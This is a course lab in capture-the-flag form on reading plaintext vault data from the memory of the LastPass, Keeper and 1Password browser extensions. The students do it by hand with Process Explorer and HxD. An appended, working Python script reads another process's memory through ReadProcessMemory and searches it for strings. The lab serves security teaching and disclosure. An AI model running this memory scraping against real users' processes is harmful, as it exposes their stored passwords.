F 211: Memory Forensics of LastPass and Keeper (15 pts + 10 extra)

What You Need for This Project

Purpose

To see how the LastPass password manager handles your private data in memory.

This project just follows this excellent write-up from MDSec: Analysing LastPass, Part 1.

Installing Chrome

On your Windows machine, if you don't already have it, get Chrome here:
https://www.google.com/chrome/

Installing Process Explorer

On your Windows machine, if you don't already have it, get Process Explorer here:
https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer

Installing HxD

On your Windows machine, if you don't already have it, get HxD here:
https://mh-nexus.de/en/hxd/

Target 1: LastPass

Installing LastPass

On your Windows machine, in Chrome, go to:
https://www.lastpass.com/
Click the "Get LastPass Free" button.

Fill in the form, as shown below.

Use a disposable email address, such as YOURNAME@mailinator.com.

Click the "Sign Up-It's Free" button.

Click the "Install LastPass" button, as shown below.

Add a fake password with the values shown below, then click the Save button.

Finding the Process with the LastPass Extension

Launch Process Explorer. Scroll to the lower section to see user processes.

There are several Chrome processes, as shown below.

Hover the mouse over a Chrome process to see its command line.

Find the process whose command line contains this switch, outlined in red in the image below:

--extension-process

Right-click that process and click Properties.

In the Properties sheet, click the Job tab.

Find the PID (Process ID). When I did it, the PID was 2684, as shown below.

Exploring the Memory of the Process

Launch HxD.

From the menu bar, click Tools, "Open main memory...".

Find the Process ID of the process containing the LastPass extension, as shown below, and double-click it.

In HxD, click Search, Find.

Search for testuser as a text string, as shown below. If nothing is found, repeat the search with HxD's Unicode (UTF-16) text encoding: browsers store some JavaScript strings as two-byte characters, which an ANSI-only search will miss.

All the data from your vault is sitting here, unencrypted, in memory! Any malware running as your user could read it out of this process with an ordinary memory read, without needing administrator privileges.

F 211.1: Password Label (15 pts)

The flag is the word before your unencrypted password, covered by a green rectangle in the image below.

Target 2: Keeper

Installing Firefox

If you don't already have it, install Firefox from
https://getfirefox.com

Installing Keeper

In Firefox, go to:
https://www.keepersecurity.com
At the top right, click "Try it Free".

In the Personal and Family section, click "Get Protected".

Enter a disposable email address ending in mailinator.com and click "Try it Free Now".

Create an account, log in, and go through the Quick Start process, as shown below.

Add a Secure Note to your Vault containing the string CCSF#.

Install the Browser Extension.

Leave Firefox open.

F 211.2: Finding the Process Containing Private Data (10 pts)

Launch Process Explorer. Click View, "Lower Pane View", DLLs.

Click View, "Show Lower Pane".

Find the process with the module firefox@keepersecurity.com loaded, as shown below.

The flag is covered by a green rectangle in the image below.

Stealing Data from the Vault

Use HxD to examine the RAM for the process you found above, using the PID, outlined in red in the image above.

Search for the string CCSF# to see your private data, as shown below.

Target 3: 1Password

Installing 1Password

In Firefox, go to:
https://1password.com/
At the top right, click "Try 1Password Free".

Click the "Personal & Family" tab.

In the 1Password box, click "Try FREE for 14 days", as shown below.

Fill in the form, as shown below. You can't use a mailinator.com address.

Enter the verification code from your email.

Use a master password of

CCSF#masterpw

On the "Add a card" page, scroll to the bottom and click "Create account and add card later".

Download the PDF emergency kit. Close the browser tab showing the emergency kit.

Adding Data to the Vault

On the 1Password page, at the lower left, in the Personal section, click the right-arrow, as shown below.

On the Personal page, at the center top, click the plus sign, outlined in red in the image below.

Add a password containing CCSF#, as shown below.

At the top right, click the Save button.

Installing the Firefox Extension

In Firefox, go to:
https://addons.mozilla.org/en-US/firefox/addon/1password-x-password-manager/
Click "Add to Firefox".

Click Add.

At the top right of your browser window, click the tiny circle-1 icon, outlined in red in the image below.

Sign in. You see a message saying "1Password is ready to go!", as shown below.

F 211.3: Finding the Process Containing Private Data (10 pts)

Launch Process Explorer. Click View, "Lower Pane View", DLLs.

Click View, "Show Lower Pane".

Find the process that has a module loaded whose name starts with formautofill, as shown below.

The flag is covered by a green rectangle in the image below.

Stealing Data from the Vault

Use HxD to examine the RAM for the process you found above, using the PID, outlined in red in the image above.

Search for the string CCSF# to see your private data, as shown below.
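All three targets above use the same manual procedure: find the browser process that hosts the extension, open its memory, and search it for a string you know is in the vault. The Python script below is an added example, not part of this project or of the MDSec write-up, that automates that procedure on the Windows VM with the Win32 calls (OpenProcess, VirtualQueryEx, ReadProcessMemory) that let one program read another same-user process's memory. It searches for the string in both ASCII and UTF-16LE, because browsers store JavaScript strings in either form and an ASCII-only search can miss them. The helper pids_with_cmdline, the function names, and the SAMPLE_REGIONS data are this example's own assumptions; the PID lookup by command line matches the LastPass step (the --extension-process switch), while for Keeper and 1Password, where the process is identified by a loaded module in Process Explorer, pass the PID you read from Process Explorer.

```python
"""Search a running process's memory for a plaintext string (Windows).

Usage on the Windows VM:  python memscan.py <pid> <string>
e.g.                      python memscan.py 2684 testuser
Run with no arguments to scan the constructed SAMPLE_REGIONS instead.
"""
import ctypes
import subprocess
import sys

# Win32 constants (winnt.h / memoryapi.h)
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010
MEM_COMMIT = 0x1000
PAGE_NOACCESS = 0x01
PAGE_GUARD = 0x100

_IS_64 = ctypes.sizeof(ctypes.c_void_p) == 8


class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    # PartitionId exists only in the 64-bit layout and shifts the later offsets.
    _fields_ = ([("BaseAddress", ctypes.c_void_p),
                 ("AllocationBase", ctypes.c_void_p),
                 ("AllocationProtect", ctypes.c_uint32)]
                + ([("PartitionId", ctypes.c_uint16)] if _IS_64 else [])
                + [("RegionSize", ctypes.c_size_t),
                   ("State", ctypes.c_uint32),
                   ("Protect", ctypes.c_uint32),
                   ("Type", ctypes.c_uint32)])


def pids_with_cmdline(image, substring):
    """PIDs of processes named `image` whose command line contains `substring`
    (e.g. 'chrome.exe', '--extension-process'). Uses the Win32_Process CIM
    class through PowerShell, so Windows only. Helper assumed for this example."""
    ps = (f"Get-CimInstance Win32_Process -Filter \"Name='{image}'\" | "
          f"Where-Object {{ $_.CommandLine -like '*{substring}*' }} | "
          "Select-Object -ExpandProperty ProcessId")
    out = subprocess.run(["powershell", "-NoProfile", "-Command", ps],
                         capture_output=True, text=True, check=True).stdout
    return [int(tok) for tok in out.split()]


def read_regions(pid):
    """Yield (base_address, bytes) for every committed, readable region of `pid`.
    Works without admin rights for a process in your own session (Windows only)."""
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32]
    k32.VirtualQueryEx.restype = ctypes.c_size_t
    k32.VirtualQueryEx.argtypes = [ctypes.c_void_p, ctypes.c_void_p,
                                   ctypes.POINTER(MEMORY_BASIC_INFORMATION), ctypes.c_size_t]
    k32.ReadProcessMemory.restype = ctypes.c_int
    k32.ReadProcessMemory.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p,
                                      ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    handle = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        addr, mbi = 0, MEMORY_BASIC_INFORMATION()
        # Walk the address space one region at a time until VirtualQueryEx fails.
        while k32.VirtualQueryEx(handle, addr, ctypes.byref(mbi), ctypes.sizeof(mbi)):
            base, size = mbi.BaseAddress or 0, mbi.RegionSize
            readable = (mbi.State == MEM_COMMIT and mbi.Protect != PAGE_NOACCESS
                        and not mbi.Protect & PAGE_GUARD)
            if readable:
                buf = ctypes.create_string_buffer(size)
                got = ctypes.c_size_t(0)
                if k32.ReadProcessMemory(handle, base, buf, size, ctypes.byref(got)):
                    yield base, buf.raw[:got.value]
            addr = base + size
    finally:
        k32.CloseHandle(handle)


def find_hits(regions, needle, context=24):
    """Search every (base, bytes) region for `needle` as ASCII and as UTF-16LE.
    Returns dicts with the absolute address, the encoding, and surrounding text."""
    hits = []
    for enc, nb in (("ascii", needle.encode("ascii")), ("utf-16-le", needle.encode("utf-16-le"))):
        width = 2 if enc == "utf-16-le" else 1
        for base, data in regions:
            off = data.find(nb)
            while off != -1:
                before = data[max(0, off - context * width):off]
                after = data[off + len(nb):off + len(nb) + context * width]
                if width == 2 and len(before) % 2:   # keep UTF-16 windows 2-byte aligned
                    before = before[1:]
                if width == 2 and len(after) % 2:
                    after = after[:-1]
                text = (before + nb + after).decode(enc, errors="replace").replace("\x00", ".")
                hits.append({"address": base + off, "encoding": enc, "context": text})
                off = data.find(nb, off + 1)
    return hits


# Constructed sample memory (not captured from any real process), for offline runs.
SAMPLE_REGIONS = [
    (0x10000, b"\x00" * 8 + b'"username":"testuser","password":"S3cret!"' + b"\x00" * 8),
    (0x20000, "login=testuser".encode("utf-16-le") + b"\x00\x00"),
    (0x30000, b"nothing here"),
]


def main(argv):
    if len(argv) < 3:
        regions, needle = SAMPLE_REGIONS, "testuser"
    else:
        if sys.platform != "win32":
            sys.exit("live process scanning needs the Windows VM")
        regions, needle = read_regions(int(argv[1])), argv[2]
    for hit in find_hits(regions, needle):
        print(f"{hit['address']:#018x} {hit['encoding']:9} {hit['context']}")


if __name__ == "__main__":
    main(sys.argv)
```

On the lab VM, pids_with_cmdline("chrome.exe", "--extension-process") gives the candidate PIDs for Target 1; for Targets 2 and 3 use the PID from Process Explorer's DLL view. Each hit prints the address, which encoding matched, and the bytes around the match, so the label preceding the password is visible in the context column.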

References

Analysing LastPass, Part 1

Posted 10-23-2021
Keeper added 11-3-22
Lastpass link fixed 11-29-22